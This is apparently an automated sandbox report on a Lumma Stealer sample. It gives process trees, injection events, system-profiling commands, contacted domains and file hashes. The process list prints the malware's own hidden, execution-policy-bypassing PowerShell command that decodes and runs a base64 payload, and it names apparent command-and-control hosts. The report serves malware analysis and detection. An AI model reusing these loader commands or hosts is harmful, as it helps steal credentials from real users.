N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 232

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

119s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\install.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2396 set thread context of 2184 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com

Processes

C:\Users\Admin\AppData\Local\Temp\install.exe

"C:\Users\Admin\AppData\Local\Temp\install.exe"

C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('powErSHeLL -nopRo -ExecUTIoNpO BYpaSS -w HId -ec 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')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/40be52e41f5e3624fc9f4e60a8e3d6b7/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec 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

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 45.61.158.86:80 45.61.158.86 tcp
US 8.8.8.8:53 availabkelk.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 sergei-esenin.com udp
US 104.21.53.8:443 sergei-esenin.com tcp

Files

\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe

MD5 e634616d3b445fc1cd55ee79cf5326ea
SHA1 ca27a368d87bc776884322ca996f3b24e20645f4
SHA256 1fcd04fe1a3d519c7d585216b414cd947d16997d77d81a2892821f588c630937
SHA512 7d491c0a97ce60e22238a1a3530f45fbb3c82377b400d7986db09eccad05c9c22fb5daa2b4781882f870ab088326e5f6156613124caa67b54601cbad8f66aa90

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\libvlc.dll

MD5 4b262612db64f26ea1168ca569811110
SHA1 8e59964d1302a3109513cd4fd22c1f313e79654c
SHA256 a9340c99206f3388153d85df4ca94d33b28c60879406cc10ff1fd10eae16523f
SHA512 9902e64eb1e5ed4c67f4b7e523b41bde4535148c6be20db5f386a1da74533ca575383f1b3154f5985e379df9e1e164b6bda25a66504edcfaa57d40b04fc658c7

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\libvlccore.dll

MD5 5bdff9dac8efdfedd169125e415a4111
SHA1 51bca77b201aa86b53735290c91bf4180cefe28e
SHA256 d5d609ce70c0459e07b7347f4a25d01e1526795d4c324034d4bbc9ac05d06ecd
SHA512 12aabb6ac23ea73d9625a3f61777f034951f333a30e17167d61c5a65d10acd2a83f392680d894ca941d20c84626f3257f3227c5f7f81c6d529b53edb0d8e4575

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\ulgbkv

MD5 8f37e80238556701210f07b7bbf91106
SHA1 b4593b7bd699bf461a568898e6b04f071476c8dd
SHA256 25a885ccdf9d1f231ef15d4abbf322513cd90ffa0699b553a64e73b0b70ca9e6
SHA512 df80ffa4625c7a35de4f577275c3794eca961cbd5ef0bd955a4a0cf662f783832ad6bc4496e8ebeb844d306d64dd0cf00f197ab419f9120bcfe804204b5be73e

C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\bmrrr

MD5 d78f6cce7dd76163e1af90c2287b7a04
SHA1 166e4715075b449fd6b9cde5ee06b66a2df050d2
SHA256 e48fe2b9bbffe143e8d9bf7f5559469de7edfc4b1a2185980379f3a74510e6e1
SHA512 741ea7ae677185b41b0a8fc05dfe250a09d3f90856e073b7713110509cec8bd0764e7333e4bf8527edd2dea8c006a00ffd8b9b53b41db169ac546eed19dad82f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 1eb710ce39c51cd352a901e3ce4d69da
SHA1 d8007d7f26418f51d8661ddd40880f55ede84b4f
SHA256 ca2753118c41e5d15d73f599354f159c365dec1dfd5f87486f0099f76acd515b
SHA512 43bd805a025fb03fc497a1484afb88020b2b7d0312ae52d002472586226edd674764afa189fb8f079c289cd3daed3fd626fb8a11c03dc70b781b620bd0bf8ffb

C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf

MD5 acfffe6de49ab6bbcb590e95d558111b
SHA1 51d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256 fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA512 94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 8758081539cb84f9ae2ab4d49dbcece2
SHA1 b5062da4d554a96f8553e2f364c8e2cac487cdc3
SHA256 95edccefdb29c534ec6ec58a31ef5f24cb8107dffe9a80839b51c3ad385bc8f7
SHA512 bba169e7aea9a80efd2a2a6e0c3ee125db77bd1346f2d00b966fd63cb91c0981ddf137ed3d6dbb810072dee1f5cfb2c6f2084b61af3b641a6027abcab234d97e

C:\Users\Admin\AppData\Local\Temp\7e12ea90

MD5 23fd6cadeacff092eacd4046d11d34d1
